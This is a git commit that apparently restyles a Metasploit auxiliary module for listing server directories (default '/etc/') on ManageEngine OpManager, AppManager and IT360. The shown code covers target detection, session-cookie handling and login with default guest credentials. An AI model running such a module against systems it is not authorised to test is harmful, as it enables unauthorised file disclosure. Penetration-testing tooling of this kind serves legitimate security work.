Do minor style fixes

bug/bundler_fix
jvazquez-r7 2015-01-30 14:13:11 -06:00
parent 89f760c94e
commit c5db13fba9
1 changed files with 26 additions and 31 deletions

View File

@ -44,17 +44,12 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
Opt::RPORT(80), Opt::RPORT(80),
OptString.new('TARGETURI', OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
[ true, "The base path to OpManager, AppManager or IT360", '/' ]), OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),
OptString.new('DIRECTORY', [false, 'Path of the directory to list', '/etc/']), OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('IAMAGENTTICKET', OptString.new('USERNAME', [true, 'The username to login as (IT360 target only)', 'guest']),
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']), OptString.new('PASSWORD', [true, 'Password for the specified username (IT360 target only)', 'guest']),
OptString.new('USERNAME', OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
[true, 'The username to login as (IT360 target only)', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username (IT360 target only)', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to (IT360 target only)'])
], self.class) ], self.class)
end end
@ -64,30 +59,33 @@ class Metasploit3 < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI']) 'uri' => normalize_uri(datastore['TARGETURI'])
}) })
if res if res
return res.get_cookies return res.get_cookies
end end
end end
def detect_it360 def detect_it360
res = send_request_cgi({ res = send_request_cgi({
'uri' => "/", 'uri' => '/',
'method' => 'GET' 'method' => 'GET'
}) })
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/ if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
return true return true
end end
return false return false
end end
def get_it360_cookie_name def get_it360_cookie_name
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri("/"), 'uri' => normalize_uri('/')
}) })
cookie = res.get_cookies cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/ if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1 return $1
else else
@ -95,20 +93,18 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
def authenticate_it360(port, path, username, password) def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil if datastore['DOMAIN_NAME'].nil?
vars_post = { vars_post = {
'LOGIN_ID' => username, 'LOGIN_ID' => username,
'PASSWORD' => password, 'PASSWORD' => password,
'isADEnabled' => "false" 'isADEnabled' => 'false'
} }
else else
vars_post = { vars_post = {
'LOGIN_ID' => username, 'LOGIN_ID' => username,
'PASSWORD' => password, 'PASSWORD' => password,
'isADEnabled' => "true", 'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME'] 'domainName' => datastore['DOMAIN_NAME']
} }
end end
@ -140,16 +136,16 @@ class Metasploit3 < Msf::Auxiliary
def login_it360 def login_it360
# Do we already have a valid cookie? If yes, just return that. # Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET'] != nil unless datastore['IAMAGENTTICKET'].nil?
cookie_name = get_it360_cookie_name cookie_name = get_it360_cookie_name
cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";" cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie return cookie
end end
# get the correct path, host and port # get the correct path, host and port
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri("/"), 'uri' => normalize_uri('/')
}) })
if res && res.redirect? if res && res.redirect?
@ -177,11 +173,10 @@ class Metasploit3 < Msf::Auxiliary
return nil return nil
end end
def run def run
# No point to continue if directory is not specified # No point to continue if directory is not specified
if datastore['DIRECTORY'].nil? || datastore['DIRECTORY'].empty? if datastore['DIRECTORY'].empty?
print_error("Please supply the path of the directory you want to list.") print_error('Please supply the path of the directory you want to list.')
return return
end end